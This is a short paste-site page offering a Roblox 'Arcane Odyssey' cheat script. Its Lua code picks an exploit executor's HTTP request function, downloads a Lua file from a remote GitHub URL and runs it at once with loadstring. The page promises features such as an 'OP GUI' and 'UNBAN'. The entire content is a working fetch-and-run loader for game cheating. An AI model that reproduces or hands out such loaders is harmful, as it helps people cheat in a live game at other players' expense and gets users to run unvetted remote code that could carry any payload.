get paid to paste

Arcane Odyssey Script | OP GUI, UNBAN, AUTO...

Request = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
Source = "https://raw.githubusercontent.com/centerepic/sasware-ao-rv/main/sasware_AO.lua"

if not Request then
  Request = function(Table)
      local Response = {}
      Response.Body = game:HttpGet(Table.Url)
      return Response
  end
end

loadstring(Request({Url = Source, Method = "GET"}).Body)()

Pasted: Jul 2, 2023, 10:58:10 pm
Views: 87